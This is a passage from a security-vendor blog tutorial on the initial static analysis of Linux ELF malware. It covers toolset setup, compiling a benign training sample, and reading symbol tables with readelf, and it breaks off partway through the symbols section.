				<h1 class="entry-title t-dianne">ELF Malware Analysis 101 Part 2: Initial Analysis </h1><div class="row top-meta"><div class="col-md-12"><div class="author-box clearfix"><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/IMG_20200610_100615-60x60.jpg" class="user-photo"><div class="user-bio"><span class="author-light">Written by </span><span class="author-name"> Avigayil Mechtinger</span><span class="author-date"> - 19 August 2020</span></div></div></div><div class="main-blog-image"><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1-1024x475.jpg" class="featured-img"></div></div><div class="row blog-cont"><div class="col-md-2 blog-side"><div class="blog-side-subscribe"><div role="form" class="wpcf7" id="wpcf7-f15120-o2" lang="en-US" dir="ltr">
<div class="screen-reader-response"><p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul></div>
<form action="/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#wpcf7-f15120-o2" method="post" class="wpcf7-form init" novalidate="novalidate" data-status="init">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="15120" />
<input type="hidden" name="_wpcf7_version" value="5.5.6" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f15120-o2" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="hidden" name="_wpcf7cf_hidden_group_fields" value="" />
<input type="hidden" name="_wpcf7cf_hidden_groups" value="" />
<input type="hidden" name="_wpcf7cf_visible_groups" value="" />
<input type="hidden" name="_wpcf7cf_repeaters" value="[]" />
<input type="hidden" name="_wpcf7cf_steps" value="{}" />
<input type="hidden" name="_wpcf7cf_options" value="{&quot;form_id&quot;:15120,&quot;conditions&quot;:[{&quot;then_field&quot;:&quot;group-570&quot;,&quot;and_rules&quot;:[{&quot;if_field&quot;:&quot;mx_Country&quot;,&quot;operator&quot;:&quot;equals&quot;,&quot;if_value&quot;:&quot;United States&quot;}]}],&quot;settings&quot;:{&quot;animation&quot;:&quot;yes&quot;,&quot;animation_intime&quot;:200,&quot;animation_outtime&quot;:200,&quot;conditions_ui&quot;:&quot;normal&quot;,&quot;notice_dismissed&quot;:false,&quot;notice_dismissed_rollback-cf7-5.5.3&quot;:true,&quot;notice_dismissed_rollback-cf7-5.5.4&quot;:true}}" />
<input type="hidden" name="_wpcf7_recaptcha_response" value="" />
</div>
<div class="form-header"></div>
<div class="cf-field cf-field-left cf-fname">
<span class="cf-label">First Name</span><br />
<span class="wpcf7-form-control-wrap FirstName"><input type="text" name="FirstName" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required fname w-98" aria-required="true" aria-invalid="false" placeholder="First Name" /></span>
</div>
<div class="cf-field cf-lname">
<span class="cf-label">Last Name</span><br />
<span class="wpcf7-form-control-wrap LastName"><input type="text" name="LastName" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required w-98" aria-required="true" aria-invalid="false" placeholder="Last Name" /></span>
</div>
<div class="cf-field cf-field-left cf-title">
<span class="cf-label">Job Title</span><br />
<span class="wpcf7-form-control-wrap JobTitle"><input type="text" name="JobTitle" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required w-98" aria-required="true" aria-invalid="false" placeholder="Job Title" /></span>
</div>
<div class="cf-field cf-company">
<span class="cf-label">Company</span><br />
<span class="wpcf7-form-control-wrap Company"><input type="text" name="Company" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required company" aria-required="true" aria-invalid="false" placeholder="Company" /></span>
</div>
<div class="cf-field cf-field-left">
<span class="cf-label">Business Email</span><br />
<span class="wpcf7-form-control-wrap EmailAddress"><input type="email" name="EmailAddress" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email email" aria-required="true" aria-invalid="false" placeholder="Business Email" /></span>
</div>
<div class="cf-field">
<span class="cf-label">Country</span><br />
<span class="wpcf7-form-control-wrap mx_Country"><select name="mx_Country" class="wpcf7-form-control wpcf7-select wpcf7-validates-as-required country" aria-required="true" aria-invalid="false"><option value="">Country</option><option value="United States">United States</option><option value="Canada">Canada</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Brazil">Brazil</option><option value="Brunei">Brunei</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option 
value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Democratic Republic of the Congo (Kinshasa)">Democratic Republic of the Congo (Kinshasa)</option><option value="Congo, Republic of(Brazzaville)">Congo, Republic of(Brazzaville)</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czechia">Czechia</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="East Timor (Timor-Leste)">East Timor (Timor-Leste)</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Grenada">Grenada</option><option value="Guatemala">Guatemala</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran, Islamic Republic of">Iran, Islamic Republic of</option><option 
value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Ivory Coast">Ivory Coast</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="Korea, Democratic People&#039;s Republic of(North Korea)">Korea, Democratic People&#039;s Republic of(North Korea)</option><option value="Korea, Republic of">Korea, Republic of</option><option value="Kosovo">Kosovo</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Lao People&#039;s Democratic Republic">Lao People&#039;s Democratic Republic</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macau">Macau</option><option value="Macedonia, Rep. of">Macedonia, Rep. 
of</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mexico">Mexico</option><option value="Micronesia, Federal States of">Micronesia, Federal States of</option><option value="Moldova, Republic of">Moldova, Republic of</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar, Burma">Myanmar, Burma</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestinian territories">Palestinian territories</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Saint 
Kitts and Nevis">Saint Kitts and Nevis</option><option value="Saint Lucia">Saint Lucia</option><option value="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Sudan">South Sudan</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syria, Syrian Arab Republic">Syria, Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania; officially the United Republic of Tanzania">Tanzania; officially the United Republic of Tanzania</option><option value="Thailand">Thailand</option><option value="Tibet">Tibet</option><option value="Togo">Togo</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option 
value="United Kingdom">United Kingdom</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Vatican City State (Holy See)">Vatican City State (Holy See)</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></span></p>
<div data-id="group-570" data-orig_data_id="group-570" data-clear_on_hide data-class="wpcf7cf_group">
 <span class="wpcf7-form-control-wrap mx_State"><select name="mx_State" class="wpcf7-form-control wpcf7-select wpcf7-validates-as-required country" aria-required="true" aria-invalid="false"><option value="">Select State</option><option value="Alabama">Alabama</option><option value="Alaska">Alaska</option><option value="American Samoa">American Samoa</option><option value="Arizona">Arizona</option><option value="Arkansas">Arkansas</option><option value="California">California</option><option value="Colorado">Colorado</option><option value="Connecticut">Connecticut</option><option value="Delaware">Delaware</option><option value="District of Columbia">District of Columbia</option><option value="Florida">Florida</option><option value="Georgia">Georgia</option><option value="Guam">Guam</option><option value="Hawaii">Hawaii</option><option value="Idaho">Idaho</option><option value="Illinois">Illinois</option><option value="Indiana">Indiana</option><option value="Iowa">Iowa</option><option value="Kansas">Kansas</option><option value="Kentucky">Kentucky</option><option value="Louisiana">Louisiana</option><option value="Maine">Maine</option><option value="Maryland">Maryland</option><option value="Massachusetts">Massachusetts</option><option value="Michigan">Michigan</option><option value="Minnesota">Minnesota</option><option value="Mississippi">Mississippi</option><option value="Missouri">Missouri</option><option value="Montana">Montana</option><option value="Nebraska">Nebraska</option><option value="Nevada">Nevada</option><option value="New Hampshire">New Hampshire</option><option value="New Jersey">New Jersey</option><option value="New Mexico">New Mexico</option><option value="New York">New York</option><option value="North Carolina">North Carolina</option><option value="North Dakota">North Dakota</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Ohio">Ohio</option><option value="Oklahoma">Oklahoma</option><option 
value="Oregon">Oregon</option><option value="Pennsylvania">Pennsylvania</option><option value="Puerto Rico">Puerto Rico</option><option value="Rhode Island">Rhode Island</option><option value="South Carolina">South Carolina</option><option value="South Dakota">South Dakota</option><option value="Tennessee">Tennessee</option><option value="Texas">Texas</option><option value="United States Minor Outlying Islands">United States Minor Outlying Islands</option><option value="Utah">Utah</option><option value="Vermont">Vermont</option><option value="Virgin Islands">Virgin Islands</option><option value="Virginia">Virginia</option><option value="Washington">Washington</option><option value="West Virginia">West Virginia</option><option value="Wisconsin">Wisconsin</option><option value="Wyoming">Wyoming</option></select></span>
</div>
</div>
<input type="hidden" name="form-title" value="" class="wpcf7-form-control wpcf7-hidden form-title" />
<div class="cf-field cf-submit">
<input type="submit" value="Subscribe" class="wpcf7-form-control has-spinner wpcf7-submit btn btn-primary" />
</div>
<div class="wpcf7-response-output" aria-hidden="true"></div></form></div><div class="side-blog-btn side-blog-btn-simple"><div>Get Free Account</div><a href="https://analyze.intezer.com/" class="btn btn-prim dodger blog-side-cta">Get started</a></div><div class="side-blog-btn side-blog-btn-fancy"><a class="blog-side-join blog-side-cta" href="https://analyze.intezer.com/"><img src="/wp-content/uploads/2022/03/intezer-cube.png" alt="" /><h3>Get Free Account</h3><div class="join-btn">Join Now</div></a></div><div class="side-blog-share">Share article<div class="a2a_kit a2a_kit_size_ addtoany_list" data-a2a-url="https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/" data-a2a-title="ELF Malware Analysis 101 Part 2: Initial Analysis "><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="Facebook" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/facebook.png" alt="Facebook"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="Twitter" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/twitter.png" alt="Twitter"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="LinkedIn" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/linkedin.png" 
alt="LinkedIn"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="Reddit" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/reddit.png" alt="Reddit"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="Copy Link" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/link.png" alt="Copy Link"></a></div></div>        <div class="top-posts">
            <h3>Top Blogs</h3>
            <div class="top-posts-cont owl-carousel"  id="owlposts" >
                    	    <div class="related-single item">
					<h4>
                        <a href="https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/">TeamTNT Cryptomining Explosion &#x1f9e8;</a>
                    </h4>
				                    <span class="post-excerpt">This post was originally published as a white paper in September 2021. Get the full...</span>	
                    <a href="https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/" class="top-more">Read more</a>
        		</div>
        	        	    <div class="related-single item">
					<h4>
                        <a href="https://www.intezer.com/blog/product-updates/automatically-scan-urls-and-analyze-malware/">Beyond Files: Automate URL Analysis with Intezer Analyze</a>
                    </h4>
				                    <span class="post-excerpt">As part of our ongoing effort to allow you to investigate any security incident, we...</span>	
                    <a href="https://www.intezer.com/blog/product-updates/automatically-scan-urls-and-analyze-malware/" class="top-more">Read more</a>
        		</div>
        	        	    <div class="related-single item">
					<h4>
                        <a href="https://www.intezer.com/blog/malware-analysis/save-incident-response-time-intezer-analyze/">3 Ways to Save Incident Response Time</a>
                    </h4>
				                    <span class="post-excerpt">Save time during incident response with these tips and tools to help your team accelerate...</span>	
                    <a href="https://www.intezer.com/blog/malware-analysis/save-incident-response-time-intezer-analyze/" class="top-more">Read more</a>
        		</div>
        	            </div>
        </div>
<link rel="stylesheet" href="/wp-content/themes/intezer-v2/css/owl.carousel.min.css">
<script type="text/javascript" src="/wp-content/themes/intezer-v2/js/owl.carousel.min.js"></script>
 <script type="text/javascript">

     // Initialise the "Top Blogs" carousel (#owlposts) once the DOM is ready.
     // Relies on jQuery ($) and the Owl Carousel plugin loaded just above, and
     // on a setDots callback defined elsewhere on the page (not visible here).
     $(document).ready(function () {
       var carouselOptions = {
         items: 1,
         loop: true,
         dots: true,
         center: true,
         margin: 0,
         rewind: false,
         autoplay: true,
         autoplayTimeout: 6000, // milliseconds between automatic slide changes
         animateIn: 'fadeIn',
         animateOut: 'fadeOut',
         // Both breakpoints show a single item; kept as configured.
         responsive: {
           0: { items: 1 },
           600: { items: 1 }
         },
         onInitialized: setDots,
         onChanged: setDots
       };
       $("#owlposts").owlCarousel(carouselOptions);
     });




			       
	</script>
</div></div><div class="col-md-9 blog-main"><div class="single-post-content"><p><strong style="font-size: 20px;">Introduction</strong><br />
In the <a href="https://www.intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought/" target="_blank" rel="noopener noreferrer nofollow">previous article</a> we profiled the ELF malware landscape and explained how malware infects systems. We discussed the current lack of ELF malware visibility, reflected in subpar detection rates by leading engines and the shortage of publicly available resources documenting Linux threats. <strong>In this article we will pursue ELF file analysis with an emphasis on static analysis.</strong></p>
<p>The purpose of initial analysis is to gather as many insights about a file as possible without spending too much time on advanced analysis techniques such as behavioral analysis.</p>
<p>The initial analysis process entails reviewing different artifacts of a file. While an artifact by itself might not be enough to make a decision, the collection of artifacts can help us determine a practical outcome for this step. A final result could be that we know what the file is or we must conduct a deeper analysis because this step wasn’t conclusive enough.</p>
<p><strong style="font-size: 20px;">Agenda</strong><br />
The lack of valuable metadata in ELF files, such as certificates and resources, provides a weaker starting point than PE files, particularly when distinguishing between trusted and malicious files. This is why it’s important to consider the context of the analyzed file and the desired outcome from the analysis. Whether you want to verify that a file is trusted or malicious, or you already know that a file is malicious but you want to classify the threat to determine the appropriate response, the information and tools presented in this article will help you further support an initial analysis conclusion.</p>
<p>We will review the following artifacts and emphasize how they can help us gather insights about a file:</p>
<ol style="color: #627d98;">
<li>ELF format static components
<ol>
<li>Symbols</li>
<li>Segments and Sections</li>
<li>ELF Header</li>
</ol>
</li>
<li>File’s Output</li>
<li>Strings</li>
<li>Code Reuse</li>
<li>Packers</li>
<li>Interpreters</li>
</ol>
<p>After covering our initial analysis toolset, we will put it to use by analyzing real samples found in the wild.</p>
<p><strong style="font-size: 20px;">Toolset</strong><br />
These are the tools and commands we will use (in alphabetical order). We will elaborate on each of them later.</p>
<ol class="int-blg">
<li><a href="http://ntinfo.biz/index.html" target="_blank" rel="noopener noreferrer nofollow">Detect It Easy</a></li>
<li><a href="http://elfparser.com/" target="_blank" rel="noopener noreferrer nofollow">ElfParser </a></li>
<li><a href="https://analyze.intezer.com/" target="_blank" rel="noopener noreferrer nofollow">Intezer Analyze</a></li>
<li><a href="https://itsfoss.com/install-linux-in-virtualbox/" target="_blank" rel="noopener noreferrer nofollow">Linux VM</a></li>
<li><a href="https://linux.die.net/man/1/objcopy" target="_blank" rel="noopener noreferrer nofollow">objcopy</a></li>
<li><a href="https://www.pyinstaller.org/" target="_blank" rel="noopener noreferrer nofollow">Pyinstaller </a></li>
<li><a href="https://linux.die.net/man/1/readelf" target="_blank" rel="noopener noreferrer nofollow">readelf</a></li>
<li><a href="https://github.com/neurobin/shc" target="_blank" rel="noopener noreferrer nofollow">shc</a></li>
<li><a href="https://linux.die.net/man/1/strings" target="_blank" rel="noopener noreferrer nofollow">strings </a></li>
<li><a href="https://github.com/yanncam/UnSHc" target="_blank" rel="noopener noreferrer nofollow">UnSHc</a></li>
<li><a href="https://upx.github.io/" target="_blank" rel="noopener noreferrer nofollow">UPX </a></li>
<li><a href="http://vmpsoft.com/" target="_blank" rel="noopener noreferrer nofollow">VMprotect</a></li>
</ol>
<p><strong style="font-size: 20px;">Getting Started</strong><br />
We will use a Linux virtual machine (VM) as our demo environment. If you don’t have a Linux VM, follow this guide to install one: <a href="https://itsfoss.com/install-linux-in-virtualbox/" target="_blank" rel="noopener noreferrer nofollow">https://itsfoss.com/install-linux-in-virtualbox/</a>.</p>
<p>We will also be compiling different samples. If you are not interested in this step, we have stored the compiled samples in a <a href="https://github.com/intezer/ELF-Malware-Analysis-101/tree/master/Part-2-Initial-Analysis" target="_blank" rel="noopener noreferrer nofollow">dedicated repository</a> for your convenience. We will refer to the samples throughout the article.</p>
<p>Let’s prepare our environment:</p>
<ol style="color: #627d98;">
<li>Run your VM.</li>
<li>If you have just installed the VM, make sure to <a href="https://www.sysnettechsolutions.com/en/take-snapshot-virtualbox-windows-10/" rel="nofollow">take a snapshot</a> of the machine so you can always restore it to a clean state.</li>
<li>Allow the shared clipboard to transfer from the Host to Guest:<br />
<img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/1.png" alt="intezer" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/1.png?is-pending-load=1" srcset="" class=" jetpack-lazy-image"><noscript><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/1.png" alt="intezer"></noscript></li>
<li style="padding-top: 15px;">Compile the <a href="https://github.com/intezer/ELF-Malware-Analysis-101/blob/master/Part-2-Initial-Analysis/Article-samples/training_sample.c" target="_blank" rel="noopener noreferrer nofollow">following code</a> (you can download the <a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/training-sample" target="_blank" rel="noopener noreferrer nofollow">compiled file from here</a>):<img class="aligncenter size-full wp-image-11694 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/Untitled.png" data-slb-group="post-images" alt="intezer" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/Untitled.png?is-pending-load=1" srcset=""><noscript><img class="aligncenter size-full wp-image-11694" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/Untitled.png" alt="intezer"></noscript></li>
</ol>
<ol type="a">
<li style="color: #627d98;">Run <strong>nano training_sample.c</strong>, copy the code, and save (ctrl+x)</li>
<li style="color: #627d98;">Run <strong>gcc training_sample.c -o training-sample</strong></li>
</ol>
<p><strong style="font-size: 20px;">ELF Format Static Components</strong><br />
In this section we will review the components of the ELF format that are relevant for initial analysis, using our compiled file.</p>
<p>When analyzing the static features of an ELF file, the <strong>readelf</strong> command is the most useful tool. <strong>readelf</strong> should already be installed on your Linux VM. Run <strong>readelf --help</strong> to review all of its available flags (note that <strong>readelf -h</strong> prints the ELF header rather than the help text). We will use this command throughout the article.</p>
<p><strong style="font-size: 20px;">Symbols</strong><br />
<strong>Definition and how they can help us:</strong><br />
Symbols describe program entities such as functions and variables that are defined in the source code and can be exported for debugging and linking purposes. Symbols can help us uncover which functions and variables the developer used in the code, giving us a better understanding of the binary’s functionality. We might also find unique function or variable names that can be searched for online to determine whether this is a known file—in other words, whether someone has already analyzed a similar binary, or whether this is an open source tool.</p>
<p><strong>In practice:</strong><br />
Let’s use the <strong>readelf</strong> command to read the file’s symbols.</p>
<p>First, run: <strong>readelf -s training-sample</strong></p>
<p>You will notice the output contains two tables: <strong>.dynsym</strong> and <strong>.symtab</strong>. The <strong>.dynsym</strong> table (dynamic symbols table) exists in dynamically linked and shared object files.</p>
<p><img loading="lazy" width="1283" height="485" class="aligncenter size-full wp-image-11683 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png" alt="Intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png 1283w, https://www.intezer.com/wp-content/uploads/2020/08/2-300x113.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/2-1024x387.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/2-768x290.png 768w" data-lazy-sizes="(max-width: 1283px) 100vw, 1283px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1283" height="485" class="aligncenter size-full wp-image-11683" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png" alt="Intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png 1283w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2-300x113.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2-1024x387.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2-768x290.png 768w " sizes="(max-width: 1283px) 100vw, 1283px" /></noscript></p>
<p>Dynamically linked binaries use external libraries, such as libc, that are loaded from the operating system at runtime. Statically linked binaries, on the other hand, are compiled together with these libraries. This means statically linked files will typically be larger than dynamically linked files. Statically linked files will likely contain large amounts of code that are related to libraries and not to the actual file’s logic.</p>
<p>The <strong>.dynsym</strong> table contains the dynamically linked symbols, such as libc functions, and the <strong>.symtab</strong> table contains all symbols (including those in the <strong>.dynsym</strong> table) that were defined in the source code. In the image above, you can see the libc functions used in our source code under the <strong>.dynsym</strong> table: <strong>fgets(), popen(), and system()</strong>.</p>
<p>The symbol table can be lengthy. For simplicity, let’s view each symbol type separately.</p>
<ol style="color: #627d98;">
<li><strong>OBJECT</strong>: global variables declared in the code.</li>
<li><strong>FUNC</strong>: functions declared in the code.</li>
<li><strong>FILE</strong>: the source files that were compiled into the binary (this is a debug symbol; if the file has been stripped of debug symbols, the symbol table won’t contain this type).</li>
</ol>
<p><strong>readelf -s training-sample | grep OBJECT</strong><br />
<img loading="lazy" width="1124" height="312" class="aligncenter size-full wp-image-11688 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png" alt="Intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png 1124w, https://www.intezer.com/wp-content/uploads/2020/08/3-300x83.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/3-1024x284.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/3-768x213.png 768w" data-lazy-sizes="(max-width: 1124px) 100vw, 1124px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1124" height="312" class="aligncenter size-full wp-image-11688" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png" alt="Intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png 1124w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3-300x83.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3-1024x284.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3-768x213.png 768w " sizes="(max-width: 1124px) 100vw, 1124px" /></noscript></p>
<p>Above we can see the global variables that were declared in the file’s source code.</p>
<p><strong>readelf -s training-sample | grep FUNC</strong><br />
